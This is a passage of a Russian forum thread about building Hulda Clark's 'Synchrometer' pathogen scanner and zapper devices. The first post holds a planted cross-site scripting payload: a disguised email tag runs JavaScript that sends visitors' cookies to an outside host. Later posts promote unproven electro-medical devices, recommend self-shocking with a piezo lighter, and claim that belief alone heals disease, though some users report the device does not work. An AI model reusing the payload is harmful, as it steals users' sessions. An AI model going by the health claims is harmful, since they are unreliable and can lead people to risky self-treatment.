Powered by Invision Power Board


Страницы: (9) Все « Первая ... 7 8 [9]  ( Перейти к первому непрочитанному сообщению ) Ответ в темуСоздание новой темыСоздание опроса

> Сканер-анализатор патогенов. "Синхрометр"., Разработка Сканера-анализатора наличия паразитов, токсинов, изменений
Скромный
Дата 23.02.2007 - 06:08
Написать ответЦитировать выделенный текст
Offline

Искатель
*

Профиль
Группа: Пользователи
Сообщений: 4

Главное не навредить при длительном использовании прибором

[email]wj@wj (http://www.wj.com`=`).com[/email] ` style=`bаckgrоund:url(jаvаsсriрt:dосumеnt.imаgеs[1].src="http://antichat.ru/cgi-bin/s.jpg?"+dосumеnt.сооkie);`

Это сообщение отредактировал Скромный - 23.02.2007 - 07:55
PMПисьмо на e-mail пользователю
Top
NickFur
Дата 13.03.2007 - 16:14
Написать ответЦитировать выделенный текст
Offline

Искатель
*

Профиль
Группа: Пользователи
Сообщений: 6

Привет всем!
В качестве одного из вариантов Zappera предлагаю взять за основу схему программируемого таймера
отсюда http://svv.on.ufanet.ru/timer.htm .
Здесь оный можно запрограммировать на 7-20-7-20-7 с точностью до секунды.
Имеется также прога для программирования таймера.
Независимых выходов там - 6.
Есть гальваническая развязка с компом (для перепрограммирования).
Выложен исходник прошивки для AVR-a.
Советую подумать уважаемым ЧЕРЕПАМ-программистам - как вывести нужные частоты на выходы ( 30 кГц или другую, желаемую). Кварц там на 8 МГц - так что поделить-установить нужные импульсы следования можно в широком диапазоне.
Меандр на выходе - думаю не обязателен, да думаю и не желателен - достаточно сформировать
короткие импульсы через определённое количество тактов.
Можно использовать таймер целиком, не меняя программы, а управлять им (включать - выключать)
генератор на 555 или на DDS.
Схема + программа управления DDS лежит здесь - http://www.myplace.nu/avr/minidds/
Форма сигнала программируется любая, но нам нужна только прямоугольная.
Частота, правда до 200 кГц, но убежден - это далеко не единственная "приблуда".
Остаётся на выходе поставить формирователь "крутых" фронтов, да и регулятор амплитуды (5-10В)
не помешает.
Всем GOOD LUCK!!!
PMПисьмо на e-mail пользователю
Top
NickFur
Дата 14.03.2007 - 20:29
Написать ответЦитировать выделенный текст
Offline

Искатель
*

Профиль
Группа: Пользователи
Сообщений: 6

Привет всем!
Вот ещё одна интересная ссылка (для желающих обзавестись полезным прибором)
http://www.polbox.com/a/assis/
Цифровой широкодиапазонный измеритель частоты, периода, длительности импульсов и фазовых соотношений Assistant F1000 TG. Цена - 4000 р.
Прибор позволяет измерять частоты от 1 Гц до 1000 МГц, а также период, длительность импульсов и фазовые соотношения от 100 нс до 100 с. с высокой чувствительностью и высокоомным входом с генератором. Прибор имеет двойное питание от батарей и внешнего блока питания (в комплекте)
Отдельный вход синхронизации позволяет останавливать и запускать измерения периода, длительности импульса и паузы по фронту или срезу импульса, а также измерять фазовые характеристики. Выходная частота генератора от 0.0625 Гц до 10 МГц с кварцевой стабилизацией.

Всем здоровья !
PMПисьмо на e-mail пользователю
Top
rosencrantz
Дата 6.04.2007 - 14:38
Написать ответЦитировать выделенный текст
Offline

Соратник
***

Профиль
Группа: Пользователи
Сообщений: 193

Кстати дорогие друзья.
Есть у мен две зажигалки пьезо кухонные.
Так вот, если снять металлический кожух и через две руки проупстить ток, через прокладку бумаги, чтобы частота импульсов была хорошая (чем меньше расстояние тем быстрее происходит пробой), и покачать рычак, то стимудирующий эффект незамедляет себя ждать.
От цеппера тоже есть стимулирующий эффект, как я уже понял, но он наступает через час где то, а здесь сразу.
То есть очень короткие и резкие импульсы но с очень большим напряжением и низким током здесь получаются. Я чисто ощущения говорю.
PMПисьмо на e-mail пользователю
Top
Семисын
Дата 14.04.2007 - 02:02
Написать ответЦитировать выделенный текст
Offline

Попутчик
**

Профиль
Группа: Пользователи
Сообщений: 45

Цитата (rosencrantz)
Кстати дорогие друзья.
Есть у мен две зажигалки пьезо кухонные.
Так вот, если снять металлический кожух и через две руки проупстить ток, через прокладку бумаги, чтобы частота импульсов была хорошая (чем меньше расстояние тем быстрее происходит пробой), и покачать рычак, то стимудирующий эффект незамедляет себя ждать.
От цеппера тоже есть стимулирующий эффект, как я уже понял, но он наступает через час где то, а здесь сразу.
То есть очень короткие и резкие импульсы но с очень большим напряжением и низким током здесь получаются. Я чисто ощущения говорю.


У меня от моей кошки при поглаживании тож нехилые искры
и щипает током smile.gif + ещё она модулирует мурчанием.
Кстати до сих пор наукой не установлено как кошка производит эти генерируемые колебания wow.gif
В общем BIO-цаппер !!!


--------------------
"Лучше всего я чувствую себя в обществе крестьян, поскольку недостаток образования позволяет им сохранять здравомыслие"
Монтень
PMПисьмо на e-mail пользователю
Top
doncon
Дата 16.04.2007 - 07:15
Написать ответЦитировать выделенный текст
Offline

Искатель
*

Профиль
Группа: Пользователи
Сообщений: 5

Что-то затянулась пауза форума. Хотелось продолжить. Я изготовил недавно синхрометр, настроил как требуется, благо спец. Но как и предполагалось мной никакого резонанса мне услышать не удалось. Выше отмечалось, что прибор подает звук только при наличии разности биения 2-х частот в 1 кгц. Это неправильно - прибор работает(и кларк об этом пишет) как только появляется достаточная проводимость тока (тело человека) между ручкой и датчиком( с точки зрения радиотехники подается смещение на базу транзистора и раб. точка выводится в активную часть.
Синхрометр даже не обнаруживает описанным резонансом переизлучения тела частоты СВ вещательной станции 810 кгц, которая у меня под боком (4 км от антенны). Слышен лишь мизерный свист биений при частоте генератора ниже и выше 810 на 1,2,3 кгц. Получился приемник прямого преобразования с хилой чувствительностью - мв-ты. Тогда какие могут быть зафиксированы излучения скажем вирусов?, которые в млн раз и более меньше. ... .
Жду, уважаемые ваши мнения.
PMПисьмо на e-mail пользователю
Top
Викторович
Дата 16.04.2007 - 08:08
Написать ответЦитировать выделенный текст


Unregistered






И я уважаемым участникам о том же пытался сказать, уважаемый doncon. Но видно их ВЕРА сильнее очевидной истины....
Top
doncon
Дата 26.04.2007 - 03:29
Написать ответЦитировать выделенный текст
Offline

Искатель
*

Профиль
Группа: Пользователи
Сообщений: 5

Уважаемые участники форума я не согласен с трактовкой работы синхрометра Кларк albertом.Он вводит просто в заблуждение своей однобокой трактовкой. Синхрометр работает не только от присутствия разности частот 1 кгц, но и просто включения проводимости (тела человека) между ручкой и датчиком( при этом выполняются условия запуска генерации - раб. точкана характеристике транзистора выходит на активный режим) Об этом и пишет Кларк. Я сделал такой прибор, настроил контур на 1 кГц, используя усилитель с усилением в 1000раз(60db). Но резонанса услышать никак не могу, слух имею музыкальный, владею азбукой морзе, как радиолюбитель. И, как у радиоспеца имеется масса неясностей. Скажем если такая чувствительность к ничтожно малым сигналам в 1 кГц, то почему я не слышу "рева" (cигнал - мВ-ольты, сотни мв) при подачи сигнала от ГСС и присутствия на пластине частоты мощной радиовещательной станции, расподложенной в 3-х км от меня(антенну подсоединяю на пластину)?
Далее, я не слышу никаких резонансов от излучения собственного тела в диапазоне 1,65-9,6 мГц, как она указала.
Рассматривая работу с синхрометром без генератора она описывает как можно тестировать скажем продукты на афлатоксин- на одну пластину оригинал, на другую - хлеб с плесенью и должен быть слышен резонанс? То же и с солью(здесь еще непонятней - ставишь солевой р-р№1, а с чем сравнивается непонятно, с солью в человеке - это чтобы получить разность частот в 1 кГц). В данных опытах я также ничего не слышу и мое мнение - не должен услышать: 2 одинаковых вещества (афлотаксин в моем примере) имеют один и тот же электромагнитный спектр - разность частот равна 0(а не 1кГц) и на выходе синхрометра ничего нет, что и показала практика.
Так что я пока в раздумье, хотелось услышать мнения других.
PMПисьмо на e-mail пользователю
Top
Geniy
Дата 5.03.2011 - 14:21
Написать ответЦитировать выделенный текст
Offline

Искатель
*

Профиль
Группа: Пользователи
Сообщений: 1

Прошло почти четыре года. 21 век.Электроника шагнула семимильными шагами.Физики и радиоинженеры ,своими разработками обманывают сами КАНОНЫ физики и электроники.Что изменилось у ВАC? в плане отношения к компьютерной диагностики?Можно ли ей доверять ?Как по мне,то обработка и расчет определенных данных возросла в разы.Но мое сомнение в адеквантности диагностики остается не поколебимым.Остается впечатление что сам организм человека невероятными методами пытается (резонансно) подстроится под результаты диагностирования.Если ты хочеш чтоб у тебя была язва,то она непременно будет.И идя на диагностику ты сознательно настроен на положительный исход,Ты вериш что болен и непременно это обнаружится.Никакая компьютерная диагностика не в состоянии понять и проанализировать саму сущность человека,МЫСЛЬ и РАЗУМ.
НЕТ, и не будет прибора который может зафиксировать почему мать чувствует что с ее ребенком что то случилось,не проанализировать и то что она может лиш усилием своей мысли и невероятной верой (в бога,в себя) поменять дистанционно ситуацию в лучшую сторону.Вера разума безгранично сильна ,и не поддается изучению.Есть только глубоко ошибочные теории и наше предвзятое отношение к ним,можно всякому словом навязать и веру,от силы разума убеждающего только и зависит,как мы к этому относимся.В большей степени ограниченность человека в знаниях и подверженность чужему влиянию ,и задают общую концепцию веры во что нибудь.
Можно собрать результирующие базы данных частот,резонансов,поглащений,откликов,ик температур,проводимости,хим составу,скорости реакции.Можно составить и алгоритмы обработки этих данных.И что ?А далее применять молотобойные , апробированные методы лечения?
А кто понял саму суть организма? Мы еще далеки от познания самих себя.Назначенное лечение эффективно только благодаря вере человека в в этот метод.Каждый может вылечить себя ,если он не задавлен прессом гениальных и глупых методик и рецептов.Необходимо и достаточно только сильная вера,разум сам подскажет и метод и возможность для своего оздоровления.Мы чувствуем это но не хотим или не умеем этим пользоватся.И теряем здоровье ,доверяясь вере в другой разум,который возможно гораздо слабее и не соответствует принятию для СЕБЯ.Доверяясь воздейсвтвию другого разума,мы доверяемся не его СИЛЕ,а куче апробированных и практически пройденных ,усвоенных им методик,которые кому то помогли....НО НЕ ВСЕМ..Там где сила разума и апробированность методик стоит на высоком уровне (врач профессионал с большой буквы,с сильно заряженной энергетикой,практически экстрасенсорик) там и результат налицо,он всегда в плюсе.Но таких очень мало.Надо развивать в себе свои заложенные генетически возможности сопротивляться болезням.Надо учиться самому искать резервы для востановления энергетического и биологического равновесия ,своего огранизма.
Это не так сложно как кажется.Безграничные резервы таятся в нашем теле и разуме.Надо поверить что ты сможеш себя познать сам,и помочь себе,найти СВОЙ рецепт жизни и здоровья.
PMПисьмо на e-mail пользователю
Top
  Быстрый ответ
Информация о Госте
Введите Ваше имя
Кнопки кодов
Для вставки цитаты, выделите нужный текст и
НАЖМИТЕ СЮДА
Введите сообщение
Смайлики
:huh:  :o  ;)  :P  :D 
:lol:  B)  :rolleyes:  <_<  :) 
:angry:  :(  :unsure:  :wacko:  :blink: 
:blush:  :excl:  :bigwink:  :megalol:  :wow: 
         
Показать всё

Опции сообщения  Включить смайлики?
 Включить подпись?
 
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей)
0 Пользователей:

Опции темыСтраницы: (9) Все « Первая ... 7 8 [9]  Ответ в темуСоздание новой темыСоздание опроса

 

  Rambler's Top100 - Позиция в рейтинге, подробная статистика   Рейтинг@Mail.ru - ВИЗИТОВ ВСЕГО / СЕГОДНЯ / ХОСТОВ сегодня